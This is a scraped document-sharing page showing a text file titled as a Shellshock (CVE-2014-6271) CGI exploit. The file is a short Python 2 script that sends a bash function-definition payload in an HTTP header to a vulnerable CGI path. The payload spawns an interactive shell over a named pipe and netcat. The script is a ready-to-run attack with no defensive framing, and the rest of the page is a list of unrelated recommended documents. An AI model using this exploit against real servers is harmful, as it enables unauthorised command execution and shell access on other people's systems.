Download pdf - cve.txt

Transcript
Page 1: cve.txt

7/21/2019 cve.txt

http://slidepdf.com/reader/full/cvetxt 1/1

##CVE-2014-6271 cgi-bin reverse shell# import httplib,urllib,sys if (len(sys.argv)<3):  print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0]  print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]  exit(0) conn = httplib.HTTPConnection(sys.argv[1])reverse_shell="() { ignored;};/bin/bash -c '/bin/rm -f /tmp/f; /usr/bin/mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f'" headers = {"Content-type": "application/x-www-form-urlencoded",  "test":reverse_shell }conn.request("GET",sys.argv[2],headers=headers)res = conn.getresponse()print res.status, res.reasondata = res.read()print data


Recommended

Άσκηση1 4
Άσκηση1 4 Documents
英文的金玉良言
英文的金玉良言 Documents
Русско-латинский словарь
Русско-латинский словарь Documents
Gain Score in Data Analysis
Gain Score in Data Analysis Documents
Махновщина
Махновщина Documents
phone
phone Documents
1 시스템분석입문
1 시스템분석입문 Documents
공학함수38가지
공학함수38가지 Documents
טבלאות פרמקולוגיה קרדיו
טבלאות פרמקולוגיה קרדיו Documents
БОРБЕНИ АВИОНИ КОМПАНИЈЕ СУХОЈ
БОРБЕНИ АВИОНИ КОМПАНИЈЕ СУХОЈ Documents
Puntuación PAEF,s
Puntuación PAEF,s Documents
CLINICA DENTAL PORTUGAL
CLINICA DENTAL PORTUGAL Documents
עבודת סיום וירולוגיה
עבודת סיום וירולוגיה Documents
حقوق الانسان بين الإسلام وبين إعلان الأمم المتحدة
حقوق الانسان بين الإسلام وبين إعلان الأمم المتحدة Documents
Active Partner List (International)
Active Partner List (International) Documents
Informacia ot BD i RIOSV 12 12 2005
Informacia ot BD i RIOSV 12 12 2005 Documents
tagalog english
tagalog english Documents
BIBLIOGRAFIA
BIBLIOGRAFIA Documents